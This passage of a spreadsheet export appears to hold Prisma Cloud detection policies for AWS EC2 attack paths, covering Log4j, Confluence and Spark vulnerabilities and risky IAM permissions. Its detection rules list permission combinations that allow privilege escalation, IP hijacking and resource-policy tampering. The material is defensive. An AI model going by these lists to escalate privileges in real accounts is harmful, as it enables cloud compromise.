Risky permissions on publicly exposed EC2 instances with unrestricted access to admin ports (SSH / RDP) may allow an attacker to get initial access to the instance. EC2 instance with s3:GetObject and s3:ListBucket permissions could further expand the surface of the attacker to gain access to sensitive data stored in s3.
Immediate attention is required to review and remove s3:GetObject and s3:ListBucket permissions. Restrict public exposure of admin ports reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X175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58" t="inlineStr"/>
      <c r="Z1758" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0) on Admin ports','EC2 with IAM role attached has s3:GetObject and s3:ListBucket permissions')</t>
        </is>
      </c>
      <c r="AA1758" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1758" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:07</t>
        </is>
      </c>
      <c r="AC1758" t="inlineStr"/>
      <c r="AD1758" t="b">
        <v>1</v>
      </c>
      <c r="AE1758" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1758" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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8" t="inlineStr">
        <is>
          <t>fc3e7085-edc4-48e7-b2e3-201e350cb9f9</t>
        </is>
      </c>
      <c r="AI1758" t="inlineStr">
        <is>
          <t>91a37cbb-f1a2-4a58-a260-29d429181538</t>
        </is>
      </c>
      <c r="AJ1758" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1758" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1759">
      <c r="A1759" t="inlineStr"/>
      <c r="B1759" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1759" s="2" t="inlineStr"/>
      <c r="D1759" t="inlineStr"/>
      <c r="E1759" t="inlineStr"/>
      <c r="F1759" t="inlineStr"/>
      <c r="G1759" t="b">
        <v>1</v>
      </c>
      <c r="H17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59" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1759" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1759" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [Log4j, CVE-2021-45046]</t>
        </is>
      </c>
      <c r="L1759" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1759" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1759" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1759" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1759" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1759" t="inlineStr"/>
      <c r="R1759" t="inlineStr"/>
      <c r="S1759" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1759" t="b">
        <v>0</v>
      </c>
      <c r="U1759" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1759" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1759" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to remote code execution (RCE) with exploits in the wild [Log4j, CVE-2021-45046]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of Log4j software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Log4j [CVE-2021-45046] vulnerability reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X175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CVE-2021-45046
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-45046</t>
        </is>
      </c>
      <c r="Y1759" t="inlineStr"/>
      <c r="Z1759" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-45046 - Apache Log4j2 &lt; 2.16.0) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-45046'))</t>
        </is>
      </c>
      <c r="AA1759" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1759" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:31</t>
        </is>
      </c>
      <c r="AC1759" t="inlineStr"/>
      <c r="AD1759" t="b">
        <v>1</v>
      </c>
      <c r="AE1759" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1759" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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59" t="inlineStr">
        <is>
          <t>1577d6fd-5b41-4744-83b7-233ea3360209</t>
        </is>
      </c>
      <c r="AI1759" t="inlineStr">
        <is>
          <t>14bc621e-0670-4368-9a65-e37aaa4fc09c</t>
        </is>
      </c>
      <c r="AJ1759" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1759" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1760">
      <c r="A1760" t="inlineStr"/>
      <c r="B1760" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1760" s="2" t="inlineStr"/>
      <c r="D1760" t="inlineStr"/>
      <c r="E1760" t="inlineStr"/>
      <c r="F1760" t="inlineStr"/>
      <c r="G1760" t="b">
        <v>1</v>
      </c>
      <c r="H17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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1760" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1760" t="inlineStr">
        <is>
          <t>Authentication bypass (BAC) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [Confluence, CVE-2022-26138]</t>
        </is>
      </c>
      <c r="L1760" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1760" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1760" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1760" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1760" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1760" t="inlineStr"/>
      <c r="R1760" t="inlineStr"/>
      <c r="S1760" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1760" t="b">
        <v>0</v>
      </c>
      <c r="U1760" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1760" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1760" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to remote code execution (RCE) with exploits in the wild [Confluence, CVE-2022-26138]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of Confluence software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Confluence authentication bypass [CVE-2022-26138] vulnerability reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X176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CVE-2022-26138
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-26138</t>
        </is>
      </c>
      <c r="Y1760" t="inlineStr"/>
      <c r="Z1760" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-26138 - Confluence authentication bypass) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-26138'))</t>
        </is>
      </c>
      <c r="AA1760" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1760" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:32</t>
        </is>
      </c>
      <c r="AC1760" t="inlineStr"/>
      <c r="AD1760" t="b">
        <v>1</v>
      </c>
      <c r="AE1760" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1760" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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0" t="inlineStr">
        <is>
          <t>df67202a-5417-4ee5-bb02-ff6bb58f3711</t>
        </is>
      </c>
      <c r="AI1760" t="inlineStr">
        <is>
          <t>b7a7bc96-11de-428f-8aeb-e472945ad56d</t>
        </is>
      </c>
      <c r="AJ1760" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1760" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1761">
      <c r="A1761" t="inlineStr"/>
      <c r="B1761" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1761" s="2" t="inlineStr"/>
      <c r="D1761" t="inlineStr"/>
      <c r="E1761" t="inlineStr"/>
      <c r="F1761" t="inlineStr"/>
      <c r="G1761" t="b">
        <v>1</v>
      </c>
      <c r="H17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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1761" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1761" t="inlineStr">
        <is>
          <t>Command injection risk due to publicly exposed and vulnerable AWS EC2 instance (Apache Spark, CVE-2022-33891)</t>
        </is>
      </c>
      <c r="L1761" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1761" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1761" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1761" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1761" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1761" t="inlineStr"/>
      <c r="R1761" t="inlineStr"/>
      <c r="S1761" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1761" t="b">
        <v>0</v>
      </c>
      <c r="U1761" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1761" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1761" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance that are publicly exposed and have known exploitable Command injection vulnerability (CVE-2022-33891).
Command injection vulnerability would allow an attacker to inject arbitrary commands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Spark Command injection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Spark (CVE-2022-33891) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X176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1761" t="inlineStr"/>
      <c r="Z1761" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-33891'))</t>
        </is>
      </c>
      <c r="AA1761" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1761" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:17</t>
        </is>
      </c>
      <c r="AC1761" t="inlineStr"/>
      <c r="AD1761" t="b">
        <v>1</v>
      </c>
      <c r="AE1761" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1761" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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1" t="inlineStr">
        <is>
          <t>f1e8f88b-40ac-4fc4-b118-77bd1ef72fdc</t>
        </is>
      </c>
      <c r="AI1761" t="inlineStr">
        <is>
          <t>d65b58c7-0edb-41a2-9e02-1914b74597cc</t>
        </is>
      </c>
      <c r="AJ1761" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1761" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1762">
      <c r="A1762" t="inlineStr"/>
      <c r="B1762" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1762" s="2" t="inlineStr"/>
      <c r="D1762" t="inlineStr"/>
      <c r="E1762" t="inlineStr"/>
      <c r="F1762" t="inlineStr"/>
      <c r="G1762" t="b">
        <v>1</v>
      </c>
      <c r="H17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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1762" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1762" t="inlineStr">
        <is>
          <t>Remote command execution risk due to AWS EC2 instance with unusual usage of instance role credentials and excessive SSM permissions</t>
        </is>
      </c>
      <c r="L1762" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1762" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1762" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1762" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1762" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1762" t="inlineStr"/>
      <c r="R1762" t="inlineStr"/>
      <c r="S1762" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1762" t="b">
        <v>0</v>
      </c>
      <c r="U1762" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1762" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1762" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with unusual usage of instance role credentials and has risky SSM permissions.
Risky permissions on AWS EC2 instances with unusual usage of instance role credentials may allow an attacker to gain access to the EC2 instance. The risky privilege escalation SSM permissions on the instance further help the attackers to escalate their privilege and perform unauthorized remote command execution actions in the cloud account. Unusual EC2 role credential usage from outside the cloud may indicate instance is already compromised.
This policy checks for the following risky permissions that could potentially lead to privilege escalation:
'ec2:DescribeInstances', 'ssm:listCommands', 'ssm:listCommandInvocations', 'ssm:sendCommand'
Immediate attention is required to review unusual usage activity of instance role credentials and risky privilege escalation SSM permissions.</t>
        </is>
      </c>
      <c r="X1762"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62" t="inlineStr"/>
      <c r="Z1762" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Unusual usage of Workload Credentials from outside the Cloud','AWS IAM policy allows Privilege escalation via EC2 describe and SSM list and send command permissions')</t>
        </is>
      </c>
      <c r="AA1762" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1762" t="inlineStr">
        <is>
          <t>2024-02-02 08:15:30</t>
        </is>
      </c>
      <c r="AC1762" t="inlineStr"/>
      <c r="AD1762" t="b">
        <v>1</v>
      </c>
      <c r="AE1762" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1762" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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2" t="inlineStr">
        <is>
          <t>c2b68bdd-2aae-4be9-9cdb-841d7281fd95</t>
        </is>
      </c>
      <c r="AI1762" t="inlineStr">
        <is>
          <t>38dc6cd4-7030-4761-90b8-1dec83f8dc6e</t>
        </is>
      </c>
      <c r="AJ1762" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1762" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1763">
      <c r="A1763" t="inlineStr"/>
      <c r="B1763" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1763" s="2" t="inlineStr"/>
      <c r="D1763" t="inlineStr"/>
      <c r="E1763" t="inlineStr"/>
      <c r="F1763" t="inlineStr"/>
      <c r="G1763" t="b">
        <v>1</v>
      </c>
      <c r="H17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763" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1763" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1763" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed and vulnerable AWS EC2 instance with iam:PassRole and AWS Glue DevEndpoint Creation permissions</t>
        </is>
      </c>
      <c r="L1763" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1763" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1763" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1763" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1763" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1763" t="inlineStr"/>
      <c r="R1763" t="inlineStr"/>
      <c r="S1763" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1763" t="b">
        <v>0</v>
      </c>
      <c r="U1763" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1763" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1763" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and have risky Glue DevEndpoint permissions that could potentially lead to privilege escalation.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The risky privilege escalation Glue DevEndpoint permissions on the instance further help the attackers to escalate their privilege and perform unauthorised actions in the cloud account.
This policy checks for the following Glue DevEndpoint permissions:
'glue:CreateDevEndpoint', 'iam:PassRole'.
Immediate attention is required to review risky permissions and grant only the least privileges required. Remove unwanted permissions assigned to the EC2 instances. Remediate critical and high vulnerabilities, and restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1763"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[PERMISSION]
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the resource-based policy of the resource
4. Remove the risky actions according to the alert details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1763" t="inlineStr"/>
      <c r="Z1763" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-ec2-describe-instances' ) and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS Compute Instance (EC2/Lambda) Assigned Glue DevEndpoint Creation Permissions Which Could Lead to Privilege Escalation') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1763" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1763" t="inlineStr">
        <is>
          <t>2024-06-21 07:13:02</t>
        </is>
      </c>
      <c r="AC1763" t="inlineStr"/>
      <c r="AD1763" t="b">
        <v>1</v>
      </c>
      <c r="AE1763" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1763" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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63" t="inlineStr">
        <is>
          <t>ae64946e-fed2-4a66-9a9c-aab503adf758</t>
        </is>
      </c>
      <c r="AI1763" t="inlineStr">
        <is>
          <t>294f2a8c-4eb5-41ac-88e4-841563feaf13</t>
        </is>
      </c>
      <c r="AJ1763" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1763" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1764">
      <c r="A1764" t="inlineStr"/>
      <c r="B1764" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1764" s="2" t="inlineStr"/>
      <c r="D1764" t="n">
        <v>3</v>
      </c>
      <c r="E1764" t="n">
        <v>0</v>
      </c>
      <c r="F1764" t="n">
        <v>0</v>
      </c>
      <c r="G1764" t="b">
        <v>1</v>
      </c>
      <c r="H17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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1764" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1764" t="inlineStr">
        <is>
          <t>IP Hijacking risk due to publicly exposed admin ports on AWS EC2 instance with Elastic IP Hijacking permissions</t>
        </is>
      </c>
      <c r="L1764" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1764" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1764" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1764" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1764" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1764" t="inlineStr"/>
      <c r="R1764" t="inlineStr"/>
      <c r="S1764" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1764" t="b">
        <v>0</v>
      </c>
      <c r="U1764" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1764" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1764" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have Elastic IP Hijacking permissions.
Risky permissions on publicly exposed EC2 instances with unrestricted access to admin ports (SSH / RDP) may allow an attacker to get initial access to the instance. EC2 instance with Elastic IP Hijacking permissions could further expand the surface of the attack and grant malicious actors to misuse the IP.
This policy checks for the following risky Elastic IP Hijacking permissions:
'ec2:DisassociateAddress', 'ec2:EnableAddressTransfer'
Immediate attention is required to review Elastic IP Hijacking permissions. Restrict public exposure of admin ports reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X176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64" t="inlineStr"/>
      <c r="Z1764" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0) on Admin ports','AWS EC2 IAM role with Elastic IP Hijacking permissions')</t>
        </is>
      </c>
      <c r="AA1764" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1764" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:08</t>
        </is>
      </c>
      <c r="AC1764" t="inlineStr"/>
      <c r="AD1764" t="b">
        <v>1</v>
      </c>
      <c r="AE1764" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1764" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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4" t="inlineStr">
        <is>
          <t>933eb2c1-1133-46b9-98e9-752a08389459</t>
        </is>
      </c>
      <c r="AI1764" t="inlineStr">
        <is>
          <t>bb40952a-cdd6-42ca-adf6-9054d0586e80</t>
        </is>
      </c>
      <c r="AJ1764" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1764" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1765">
      <c r="A1765" t="inlineStr"/>
      <c r="B1765" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1765" s="2" t="inlineStr"/>
      <c r="D1765" t="n">
        <v>15</v>
      </c>
      <c r="E1765" t="n">
        <v>0</v>
      </c>
      <c r="F1765" t="n">
        <v>0</v>
      </c>
      <c r="G1765" t="b">
        <v>1</v>
      </c>
      <c r="H17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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1765" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1765" t="inlineStr">
        <is>
          <t>Resource based policy tampering risk due to a publicly exposed and vulnerable EC2 instance with risky resource based policy altering permissions</t>
        </is>
      </c>
      <c r="L1765" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1765" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1765" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1765" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1765" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1765" t="inlineStr"/>
      <c r="R1765" t="inlineStr"/>
      <c r="S1765" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1765" t="b">
        <v>0</v>
      </c>
      <c r="U1765" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1765" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1765" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities and have resource based policy altering permissions.
A publicly exposed and vulnerable AWS EC2 instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. EC2 instance with resource-based policy altering permissions can modify resource policies and make any resource publicly available.
This policy checks for the following risky database management write access permissions: 
'ecr:SetRepositoryPolicy','serverlessrepo:PutApplicationPolicy','backup:PutBackupVaultAccessPolicy','efs:PutFileSystemPolicy','glacier:SetVaultAccessPolicy','secretsmanager:PutResourcePolicy','events:PutPermission','mediastore:PutContainerPolicy','glue:PutResourcePolicy','ses:PutIdentityPolicy','lambda:AddPermission','lambdaAddLayerVersionPermission','s3:PutBucketPolicy','s3:PutBucketAcl','s3:PutObject','s3:PutObjctAcl','kms:CreateGrant','kms:PutKeyPolicy','es:UpdateElasticsearchDomainConfig','sns:AddPermission','sqs:AddPermission'
Immediate attention is required to grant the least privileges required and remove unwanted risky permissions assigned to the EC2 instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X176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65" t="inlineStr"/>
      <c r="Z1765" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 machine with write access permission to resource-based policies') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1765" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1765" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1765" t="inlineStr"/>
      <c r="AD1765" t="b">
        <v>1</v>
      </c>
      <c r="AE1765" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1765" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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5" t="inlineStr">
        <is>
          <t>57fb36bf-4b13-4e40-92d1-fd0dd696e4d5</t>
        </is>
      </c>
      <c r="AI1765" t="inlineStr">
        <is>
          <t>653f351e-b68a-45bf-a0b7-9d624c890d1b</t>
        </is>
      </c>
      <c r="AJ1765" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1765" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1766">
      <c r="A1766" t="inlineStr"/>
      <c r="B1766" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1766" s="2" t="inlineStr"/>
      <c r="D1766" t="n">
        <v>3</v>
      </c>
      <c r="E1766" t="n">
        <v>0</v>
      </c>
      <c r="F1766" t="n">
        <v>0</v>
      </c>
      <c r="G1766" t="b">
        <v>1</v>
      </c>
      <c r="H17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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1766" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1766" t="inlineStr">
        <is>
          <t>Unauthorized access or account actions risk due to publicly exposed admin ports on AWS EC2 instance with sensitive IAM 'write' permissions</t>
        </is>
      </c>
      <c r="L1766" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1766" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1766" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1766" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1766" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1766" t="inlineStr"/>
      <c r="R1766" t="inlineStr"/>
      <c r="S1766" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1766" t="b">
        <v>0</v>
      </c>
      <c r="U1766" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1766" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1766" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have risky IAM write permissions.
